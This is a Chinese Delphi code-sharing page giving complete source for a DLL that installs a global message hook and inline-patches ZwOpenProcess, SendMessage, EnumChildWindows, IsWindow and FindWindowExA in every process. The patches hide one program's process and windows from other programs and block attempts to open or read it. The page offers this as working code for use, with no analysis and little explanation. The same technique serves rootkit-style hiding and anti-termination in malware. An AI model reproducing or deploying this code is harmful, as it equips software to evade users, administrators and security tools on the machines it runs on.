本文整理自网络,侵删。
CODE
library ProtectUser;
uses
SysUtils,
windows,
Messages,
ApiCallBack,
MyApi,
Hook_Pas in 'Hook_Pas.pas';
var
DLLHook: HHOOK;
procedure HookProc(nCode, wParam, lParam: LongWORD);stdcall;
begin
CallNextHookEx(DLLHook, nCode, wParam, lParam);
end;
{ 状态挂钩 }
function InstallHook(): Boolean; stdcall;
begin
DLLHook := SetWindowsHookEx(WH_GETMESSAGE, @HookProc, Hinstance, 0);
Result := DLLHook <> 0;
end;
{ 卸载挂钩 }
procedure UnHook; stdcall;
begin
UnLoadApiHook(ApiHook_ZwOpenProcess);
UnLoadApiHook(ApiHook_SendMessageA);
UnLoadApiHook(ApiHook_SendMessageW);
UnLoadApiHook(ApiHook_EnumChildWindows);
UnLoadApiHook(ApiHook_IsWindow);
UnLoadApiHook(ApiHook_FindWindowExA);
UnHookWindowsHookEx(DLLHook);
end;
procedure MyDLLHandler(Reason: Integer);
begin
if Reason = DLL_PROCESS_ATTACH then begin
hWndExe:=FindWindow('ThunderRT6FormDC','Simple System AntiVirus (Guard)');
GetWindowThreadProcessId(hWndExe,MyProcessId);
LoadApiHook('NTDLL.DLL','ZwOpenProcess',@ZwOpenProcessCallBack,ApiHook_ZwOpenProcess);
LoadApiHook('USER32.DLL','SendMessageA',@SendMessageACallBack,ApiHook_SendMessageA);
LoadApiHook('USER32.DLL','SendMessageW',@SendMessageWCallBack,ApiHook_SendMessageW);
LoadApiHook('USER32.DLL','EnumChildWindows',@EnumChildWindowsCallBack,ApiHook_EnumChildWindows);
LoadApiHook('USER32.DLL','IsWindow',@IsWindowCallBack,ApiHook_IsWindow);
LoadApiHook('USER32.DLL','FindWindowExA',@FindWindowExACallBack,ApiHook_FindWindowExA);
end;
if Reason = DLL_PROCESS_DETACH then begin
UnHook;
end;
end;
exports
InstallHook,UnHook;
begin
DLLProc := @MyDLLHandler;
MyDLLhandler(DLL_PROCESS_ATTACH);
end.
unit ApiCallBack;
interface
uses
SysUtils,
windows,
Messages,
MyApi,
Hook_Pas;
var
hWndExe:HWND;
MyProcessId:Cardinal;
ApiHook_ZwOpenProcess:TApiHook;
ApiHook_SendMessageA:TApiHook;
ApiHook_SendMessageW:TApiHook;
ApiHook_EnumChildWindows:TApiHook;
ApiHook_IsWindow:TApiHook;
ApiHook_FindWindowExA:TApiHook;
function ZwOpenProcessCallBack(
var ProcessHandle :Cardinal;
const AccessMark:Cardinal;
var OA : Object_AttriButes;
var CI : Client_ID):LongInt;stdcall;
function SendMessageACallBack(hWnd: HWND; Msg: UINT; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
function SendMessageWCallBack(hWnd: HWND; Msg: UINT; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
function EnumChildWindowsCallBack(hWndParent: HWND; lpEnumFunc: TFNWndEnumProc; lParam: LPARAM): BOOL; stdcall;
function IsWindowCallBack(hWnd: HWND): BOOL; stdcall;
function FindWindowExACallBack(Parent, Child: HWND; ClassName, WindowName: PChar): HWND; stdcall;
implementation
function ZwOpenProcessCallBack(
var ProcessHandle :Cardinal;
const AccessMark:Cardinal;
var OA : Object_AttriButes;
var CI : Client_ID):LongInt;stdcall;
begin
if CI.UniqueProcess<>MyProcessId then begin
HookStatus(False,ApiHook_ZwOpenProcess);
Result:= ZwOpenProcess(
ProcessHandle,
AccessMark,
OA,
CI);
HookStatus(True,ApiHook_ZwOpenProcess);
end
else begin
ProcessHandle:=Cardinal(-1);
end;
end;
function SendMessageACallBack(hWnd: HWND; Msg: UINT; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
var
ProcessId:Cardinal;
begin
GetWindowThreadProcessId(hWnd,ProcessId);
if ProcessId<>MyProcessId then begin
HookStatus(False,ApiHook_SendMessageA);
Result:=SendMessageA(hWnd, Msg, wParam, lParam);
HookStatus(True,ApiHook_SendMessageA);
end;
end;
function SendMessageWCallBack(hWnd: HWND; Msg: UINT; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
var
ProcessId:Cardinal;
begin
GetWindowThreadProcessId(hWnd,ProcessId);
if ProcessId<>MyProcessId then begin
HookStatus(False,ApiHook_SendMessageW);
Result:=SendMessageW(hWnd, Msg, wParam, lParam);
HookStatus(True,ApiHook_SendMessageW);
end
else begin
if Msg<>WM_GETTEXT then begin
HookStatus(False,ApiHook_SendMessageW);
Result:=SendMessageW(hWnd, Msg, wParam, lParam);
HookStatus(True,ApiHook_SendMessageW);
end;
end;
end;
function EnumChildWindowsCallBack(hWndParent: HWND; lpEnumFunc: TFNWndEnumProc;
lParam: LPARAM): BOOL; stdcall;
var
ProcessId:Cardinal;
begin
GetWindowThreadProcessId(hWndParent,ProcessId);
if ProcessId<>MyProcessId then begin
HookStatus(False,ApiHook_EnumChildWindows);
Result:=EnumChildWindows(hWndParent, lpEnumFunc, lParam);
HookStatus(True,ApiHook_EnumChildWindows);
end;
end;
function IsWindowCallBack(hWnd: HWND): BOOL; stdcall;
var
ProcessId:Cardinal;
begin
GetWindowThreadProcessId(hWnd,ProcessId);
if ProcessId<>MyProcessId then begin
HookStatus(False,ApiHook_IsWindow);
Result:=IsWindow(hWnd);
HookStatus(True,ApiHook_IsWindow);
end;
end;
function FindWindowExACallBack(Parent, Child: HWND; ClassName, WindowName: PChar): HWND; stdcall;
var
ProcessId:Cardinal;
begin
GetWindowThreadProcessId(Child,ProcessId);
if ProcessId<>MyProcessId then begin
HookStatus(False,ApiHook_FindWindowExA);
Result:=FindWindowExA(Parent, Child, ClassName, WindowName);
HookStatus(True,ApiHook_FindWindowExA);
end;
end;
end.
unit Hook_Pas;
interface
type
TApiHook = record
OldProc:array[0..7] of byte;
NewProc:array[0..7] of byte;
OldAddr,NewAddr:Pointer;
end;
Function LoadApiHook(DllName:PAnsiChar;ApiName:PAnsiChar;FuncCallBack:Pointer;Var ApiHook :TApiHook):Boolean;stdcall;
Function UnLoadApiHook(var ApiHook:TApiHook):Boolean;stdcall;
Function HookStatus(blnIsHook:Boolean;var ApiHook:TApiHook):Boolean;stdcall;
implementation
uses
Windows,Dialogs;
Function LoadApiHook(DllName:PAnsiChar;ApiName:PAnsiChar;FuncCallBack:Pointer;Var ApiHook :TApiHook):Boolean;stdcall;
var
hMod:Cardinal;
Tmp:array[0..3] of byte;
nSize:Cardinal;
begin
ApiHook.OldAddr:=GetProcAddress(LoadLibrary(DllName),ApiName);
Move(DWORD(FuncCallBack),Tmp,4);
with ApiHook do begin
Newproc[0]:=$B8; //MOV EAX,[NewProc]
NewProc[1] := Tmp[0];
NewProc[2] := Tmp[1];
NewProc[3] := Tmp[2];
NewProc[4] := Tmp[3];
NewProc[5]:=$FF;
NewProc[6]:=$E0; //JMP EAX
NewProc[7]:=0;
if ReadProcessMemory(Cardinal(-1),OldAddr,@OldProc,8,nSize) then
if WriteProcessMemory(Cardinal(-1),OldAddr,@NewProc,8,nSize) then begin
LoadApiHook:=True;
end;
end;
end;
Function UnLoadApiHook(var ApiHook:TApiHook):Boolean;stdcall;
var
nSize:Cardinal;
begin
with ApiHook do begin
if WriteProcessMemory(Cardinal(-1),ApiHook.OldAddr,@ApiHook.OldProc,8,nSize) then begin
UnLoadApiHook:=True;
end;
end;
end;
Function HookStatus(blnIsHook:Boolean;var ApiHook:TApiHook):Boolean;stdcall;
var
nSize: Cardinal;
begin
with ApiHook do begin
if blnIsHook = True then
begin
if WriteProcessMemory(Cardinal(-1), ApiHook.OldAddr, @NewProc, 8, nSize) then begin
HookStatus:=True;
end;
end
else
begin
if WriteProcessMemory(Cardinal(-1), ApiHook.OldAddr, @OldProc, 8, nSize) then begin
HookStatus:=True;
end;
end;
end;
end;
end.
unit MyApi;
interface
type
OBJECT_ATTRIBUTES=record
Length :Cardinal;
RootDirectory :Cardinal;
ObjectName :Pointer;
Attributes :Cardinal;
SecurityDescriptor :Cardinal;
SecurityQualityOfService :Cardinal;
end;
CLIENT_ID=record
UniqueProcess :Cardinal;
UniqueThread :Cardinal;
end;
Function NtOpenProcess(
var ProcessHandle :Cardinal;
const AccessMark:Cardinal;
var OA : Object_Attributes;
var CI : Client_ID) :LongInt;stdcall;external 'NTDLL.DLL';
Function ZwOpenProcess(
var ProcessHandle :Cardinal;
const AccessMark:Cardinal;
var OA : Object_Attributes;
var CI : Client_ID) :LongInt;stdcall;external 'NTDLL.DLL';
implementation
end. 相关阅读 >>
Delphi �c 如何使用datasnap获取作为标头传递的标记?
Delphi controlcount和componentcount的区别
Delphi isipadress 非正则表达式验证ip的方法
Delphi -- gdi+ Delphi如何让 tgpimage 直接从流中加载图片
Delphi 用 getenvironmentvariable 获取常用系统环境变量
更多相关阅读请进入《Delphi》频道 >>
